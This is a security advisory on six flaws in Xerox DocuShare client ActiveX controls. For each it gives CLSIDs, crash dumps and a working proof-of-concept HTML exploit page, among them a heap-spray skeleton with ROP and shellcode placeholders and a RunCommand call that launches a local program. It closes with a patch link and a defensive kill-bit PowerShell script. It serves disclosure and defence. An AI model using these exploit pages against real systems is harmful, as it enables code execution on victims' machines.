SSD Advisory – Xerox DocuShare Multiple Vulnerabilities

Introduction
DocuShare is a content management system developed by Xerox Corporation. DocuShare makes use of open standards and allows for managing content, integrating it with other business systems, and developing customized and packaged software applications.
Multiple vulnerabilities have been found in Xerox DocuShare:

  • DSUtilityLib.HelperObj.4 ActiveX Control ShowHelp Method lstrcatW() Call Stack Buffer Overflow Vulnerability
  • DSUtilityLib.HelperObj.4 ActiveX Control GetResourceString Method _vswprintf() Call Stack Buffer Overflow Vulnerability
  • DSUtilityLib.HelperObj.4 ActiveX Control ProfileInt Property wsprintfW() Call Stack Buffer Overflow Vulnerability
  • DSITEMENUMLib.ItemObj.4 ActiveX Control BaseType Property Stack Buffer Overflow Vulnerability
  • DsSearch.SearchConsole.1 ActiveX Control RestrictGlobalScope Method wcscpy() Call Stack Buffer Overflow Vulnerability
  • DSUtilityLib.HelperObj.4 ActiveX Control RunCommand Method CreateProcessW() Call Command Execution Vulnerability

Vulnerable Version
Xerox DsClient version 6.5.2 b36
DSUtilityLib.HelperObj.4 ActiveX Control ShowHelp Method lstrcatW() Call Stack Buffer Overflow Vulnerability
DocuShare installs an ActiveX control with the following settings:

CLSID: {5F47B86B-7D68-4443-824C-A943BF0AD6DC}
Progid: DSUtilityLib.HelperObj.4
Binary Path: C:\Program Files (x86)\Xerox\DSClient\UtilLib.dll
Implements IObjectSafety: True
Safe For Initialization (IObjectSafety): False
Safe For Scripting (IObjectSafety): True

According to the IObjectSafety interface, this control is marked safe for scripting, so Internet Explorer will allow its properties and methods to be scripted, subject to the user's browser security settings.
The ActiveX offers the ShowHelp method, see typelib:

...
/* DISPID=1610743821 */
function ShowHelp(
    /* VT_BSTR [8] [in] */ $Application,
    /* VT_BSTR [8] [in] */ $Section,          <------------
    /* VT_PTR [26] [in] --> VT_VARIANT [12]  */ &$Flags,
    /* VT_PTR [26] [in] --> VT_VARIANT [12]  */ &$WindowHandle
    )
 {
    /* Show help */
 }
...

The Section parameter suffers from a stack buffer overflow vulnerability because of a dangerous call to lstrcatW() inside UtilLib.dll; the crash is shown in the WinDbg output below.

WinDbg shows:
(1538.ee8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=03fdb154 ebx=000445c2 ecx=0000fddd edx=fffffffe esi=0baa4ea0 edi=03fdfffe
eip=76688296 esp=03fdb104 ebp=03fdb12c iopl=0         nv up ei pl nz na po cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010203
KERNEL32!lstrcatW+0x40:
76688296 f3a5            rep movs dword ptr es:[edi],dword ptr [esi]

Exploit

<!-- UtilLib.dll -->
<html>
<body>
<object classid='clsid:5F47B86B-7D68-4443-824C-A943BF0AD6DC' id='obj'></object>
<script>
var yy = "";
for (var i = 0; i < 50000; i++) {
    yy = yy + unescape("%u4141%u4141");
}
obj.ShowHelp("AA",yy,"AA","AA");
</script>
</body>
</html>

DSUtilityLib.HelperObj.4 ActiveX Control GetResourceString Method _vswprintf() Call Stack Buffer Overflow Vulnerability
Xerox DocuShare installs an ActiveX control with the following settings:

CLSID: {5F47B86B-7D68-4443-824C-A943BF0AD6DC}
Progid: DSUtilityLib.HelperObj.4
Binary Path: C:\Program Files (x86)\Xerox\DSClient\UtilLib.dll
Implements IObjectSafety: True
Safe For Initialization (IObjectSafety): False
Safe For Scripting (IObjectSafety): True

According to the IObjectSafety interface, this control is marked safe for scripting, so Internet Explorer will allow its properties and methods to be scripted, subject to the user's browser security settings.
The ActiveX offers the GetResourceString method, see typelib:

...
/* DISPID=1610743823 */
/* VT_BSTR [8] */
function GetResourceString(
        /* VT_BSTR [8] [in] */ $SatelliteName,  <---------------
        /* VT_I4 [3] [in] */ $ResourceId
        )
{
        /* Get resource string */
}
...

The SatelliteName parameter suffers from a stack buffer overflow vulnerability because of a dangerous call to _vswprintf() inside UtilLib.dll, see the vulnerable code below.

WinDbg shows:
(1350.e98): Access violation - code c0000005 (first chance)
eax=00004141 ebx=0cca2a84 ecx=04320000 edx=00000073 esi=0431aff8 edi=0431aff8
eip=70e1edbe esp=0431ab0c ebp=0431ab28 iopl=0         nv up ei pl nz ac po cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010213
MSVCR90!fputwc_nolock+0x163:
70e1edbe 668901          mov     word ptr [ecx],ax        ds:002b:04320000=4552
SEH chain:
0:006> !exchain
UtilLib!DllUnregisterServer+16446 (0d2ec3f6)
0431befc: 41414141
Invalid exception stack at 41414141

Vulnerable code (UtilLib.dll):
;----------------------------------------------------------------------------------------------------
 1001219D  CCCCCC                    		Align	4
 100121A0                           SUB_L100121A0:
 100121A0  8B4C2404                  		mov	ecx,[esp+04h]
 100121A4  8D442408                  		lea	eax,[esp+08h]
 100121A8  50                        		push	eax
 100121A9  51                        		push	ecx
 100121AA  52                        		push	edx
 100121AB  FF15E8120810              		call	[MSVCR90.dll!_vswprintf]  <------- dangerous call
 100121B1  83C40C                    		add	esp,0000000Ch
 100121B4  C3                        		retn
;----------------------------------------------------------------------------------------------------

Exploit

<!-- UtilLib.dll -->
<html>
<body>
<object classid='clsid:5F47B86B-7D68-4443-824C-A943BF0AD6DC' id='obj'></object>
<script>
var xx = "";
for (var i = 0; i < 5000; i++) {
    xx = xx + unescape("%u4141%u4141");
}
obj.GetResourceString(xx,1);
</script>
</body>
</html>

DSUtilityLib.HelperObj.4 ActiveX Control ProfileInt Property wsprintfW() Call Stack Buffer Overflow Vulnerability
DocuShare installs an ActiveX control with the following settings:

CLSID: {5F47B86B-7D68-4443-824C-A943BF0AD6DC}
Progid: DSUtilityLib.HelperObj.4
Binary Path: C:\Program Files (x86)\Xerox\DSClient\UtilLib.dll
Implements IObjectSafety: True
Safe For Initialization (IObjectSafety): False
Safe For Scripting (IObjectSafety): True

According to the IObjectSafety interface, this control is marked safe for scripting, so Internet Explorer will allow its properties and methods to be scripted, subject to the user's browser security settings.
The ActiveX offers the ProfileInt property, see typelib:

...
Property Let ProfileInt (
 	ByVal Section  As String , <-----------
 	ByVal Name  As String
)  As Long
...

The Section parameter suffers from a stack buffer overflow vulnerability because of a dangerous call to wsprintfW() inside UtilLib.dll; the crash is shown in the WinDbg output below.

WinDbg shows:
(4368.4344): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=41414141 edx=7733b4ad esi=00000000 edi=00000000
eip=41414141 esp=0018e774 ebp=0018e794 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
41414141 ??              ???

Exploit

<!-- UtilLib.dll -->
<html>
<body>
<div id="blah"></div>
<object classid='clsid:5F47B86B-7D68-4443-824C-A943BF0AD6DC' id='obj'></object>
<script>
var div_container = document.getElementById("blah");
div_container.style.cssText = "display:none";
var data;
var offset = 0x100;
var junk = unescape("%u4141%u4141");
while (junk.length < 0x1000) junk += junk;
var rop = unescape("%u4141%u4141");
var shellcode = unescape("%u4141%u4141");
data = junk.substring(0, offset) + rop + shellcode;
data += junk.substring(0, 0x800 - offset - rop.length - shellcode.length);
while (data.length < 0x80000) data += data;
for (var i = 0; i < 0x800; i++) {
    var x = document.createElement("button");
    x.title = data.substring(0, 0x40000 - 0x58);
    div_container.appendChild(x);
}
var yy = "";
for (i = 0; i < 500; i++) {
    yy = yy + unescape("%u4141%u4141");
}
obj.ProfileInt(yy, "AAA") = 1;
</script>
</body>
</html>

DSITEMENUMLib.ItemObj.4 ActiveX Control BaseType Property Stack Buffer Overflow Vulnerability
DocuShare installs an ActiveX control with the following settings:

CLSID: {A0473614-A25D-11D1-BDB2-000086139E6F}
Progid: DSITEMENUMLib.ItemObj.4
Binary Path: C:\Program Files (x86)\Xerox\DSClient\ItemEnum.dll
Implements IObjectSafety: True
Safe For Initialization (IObjectSafety): False
Safe For Scripting (IObjectSafety): True

According to the IObjectSafety interface, this control is marked safe for scripting, so Internet Explorer will allow its properties and methods to be scripted, subject to the user's browser security settings.
The ActiveX offers the BaseType property, see typelib:

...
/* DISPID=1610743980 */
/* Get property BaseType */
var $BaseType;
...

The property suffers from a stack buffer overflow vulnerability because of a dangerous copy loop inside ItemEnum.dll; the crash is shown in the WinDbg output below.

WinDbg shows:
(55c.2530): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=80070057 ebx=068d3d8c ecx=89155c39 edx=00000000 esi=035eb770 edi=035eb58c
eip=00410041 esp=035eb54c ebp=035eb558 iopl=0         nv up ei pl nz ac po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210212
00410041 ??              ???

Exploit

<!-- ItemEnum.dll -->
<html>
<body>
<object classid='clsid:A0473614-A25D-11D1-BDB2-000086139E6F' id='obj'></object>
<script>
var xx = "";
for (var i = 0; i < 1000; i++) {
    xx = xx + unescape("%uAAAA%uAAAA");
}
obj.BaseType = xx;
</script>
</body>
</html>

DsSearch.SearchConsole.1 ActiveX Control RestrictGlobalScope Method wcscpy() Call Stack Buffer Overflow Vulnerability
DocuShare installs an ActiveX control with the following settings:

CLSID: {E29FF196-C2B9-4E33-A147-1A4E97898E62}
Progid: DsSearch.SearchConsole.1
Binary Path: C:\Program Files (x86)\Xerox\DSClient\DsSearch.dll
Implements IObjectSafety: True
Safe For Initialization (IObjectSafety): True
Safe For Scripting (IObjectSafety): True

According to the IObjectSafety interface, this control is marked safe for scripting and safe for initialization, so Internet Explorer will allow its properties and methods to be scripted, subject to the user's browser security settings.
The ActiveX offers the RestrictGlobalScope method, see typelib:

...
 /* DISPID=1 */
 function RestrictGlobalScope(
         /* VT_I4 [3] [in] */ $ServerId,
         /* VT_BSTR [8] [in] */ $CollectionHandle, <-------
         /* VT_BSTR [8] [in] */ $CollectionName
         )
 {
         /* method RestrictGlobalScope */
 }
...

The CollectionHandle parameter suffers from a stack buffer overflow vulnerability because of a dangerous call to wcscpy() inside DsSearch.dll; the crash is shown in the WinDbg output below.

WinDbg shows:
(c94.3ec): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=1761749a ebx=176175d2 ecx=00000000 edx=00000000 esi=06b160c0 edi=00000000
eip=06af76cb esp=0400b334 ebp=0400b5f4 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
DsSearch!DllUnregisterServer+0x13b96:
06af76cb 8b4308          mov     eax,dword ptr [ebx+8] ds:002b:176175da=????????

Exploit

<!-- DsSearch.dll -->
<html>
<body>
<object classid='clsid:E29FF196-C2B9-4E33-A147-1A4E97898E62' id='obj'></object>
<script>
var xx = "";
for (var i = 0; i < 5000; i++) { xx = xx + unescape("%uAAAA%uAAAA"); }
obj.RestrictGlobalScope(1,xx,"A");
</script>
</body>
</html>

DSUtilityLib.HelperObj.4 ActiveX Control RunCommand Method CreateProcessW() Call Command Execution Vulnerability
DocuShare installs an ActiveX control with the following settings:

CLSID: {5F47B86B-7D68-4443-824C-A943BF0AD6DC}
Progid: DSUtilityLib.HelperObj.4
Binary Path: C:\Program Files (x86)\Xerox\DSClient\UtilLib.dll
Implements IObjectSafety: True
Safe For Initialization (IObjectSafety): False
Safe For Scripting (IObjectSafety): True

According to the IObjectSafety interface, this control is marked safe for scripting, so Internet Explorer will allow its properties and methods to be scripted, subject to the user's browser security settings.
The ActiveX offers the RunCommand method.

This method suffers from a command execution vulnerability because the caller controls the first two arguments of a CreateProcessW() call inside UtilLib.dll, so any scripting page that can instantiate the control can start an arbitrary local program.

Exploit

<body>
<div id="blah"></div>
<object classid='clsid:5F47B86B-7D68-4443-824C-A943BF0AD6DC' id='target'></object>
<script>
target.RunCommand("c:\\windows\\system32\\calc.exe", "a");
</script>

Vendor Response
Xerox has released a patch that addresses these issues: https://docushare.xerox.com/doug/dsweb/View/Collection-16733.
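Until the vendor patch is deployed, the scripting path that each section above attributes to IObjectSafety can be blocked host-side by setting the Internet Explorer kill bit on the affected controls. The script below is an added example, not part of this advisory or of Xerox's patch; it assumes an elevated PowerShell session on a Windows host and uses only the three CLSIDs listed in this advisory.

```powershell
# Added example: audit (and with -Apply, set) the IE ActiveX kill bit for the
# three DocuShare controls named in this advisory. Run elevated.
param([switch]$Apply)

# Compatibility Flags bit 0x400 = "kill bit": IE refuses to instantiate the control.
$KillBit = 0x400
$Controls = @{
    '{5F47B86B-7D68-4443-824C-A943BF0AD6DC}' = 'DSUtilityLib.HelperObj.4 (UtilLib.dll)'
    '{A0473614-A25D-11D1-BDB2-000086139E6F}' = 'DSITEMENUMLib.ItemObj.4 (ItemEnum.dll)'
    '{E29FF196-C2B9-4E33-A147-1A4E97898E62}' = 'DsSearch.SearchConsole.1 (DsSearch.dll)'
}
# The controls are 32-bit, so on 64-bit Windows check both registry views.
$Roots = @(
    'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility',
    'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility'
)

foreach ($root in $Roots) {
    foreach ($clsid in $Controls.Keys) {
        $key = Join-Path $root $clsid
        $flags = 0
        if (Test-Path $key) {
            $item = Get-ItemProperty -Path $key -Name 'Compatibility Flags' -ErrorAction SilentlyContinue
            if ($null -ne $item) { $flags = [int]$item.'Compatibility Flags' }
        }
        $isSet = ($flags -band $KillBit) -ne 0
        $state = if ($isSet) { 'KILLBIT' } else { 'MISSING' }
        '{0,-8} {1} {2}' -f $state, $clsid, $Controls[$clsid]
        if ($Apply -and -not $isSet) {
            # Preserve any other flag bits already present and OR in the kill bit.
            New-Item -Path $key -Force | Out-Null
            Set-ItemProperty -Path $key -Name 'Compatibility Flags' -Type DWord -Value ($flags -bor $KillBit)
            '         -> kill bit set'
        }
    }
}
```

Run without -Apply first to see the current state; the kill bit is a blocking control for Internet Explorer only and does not replace the vendor patch for other hosts of the controls.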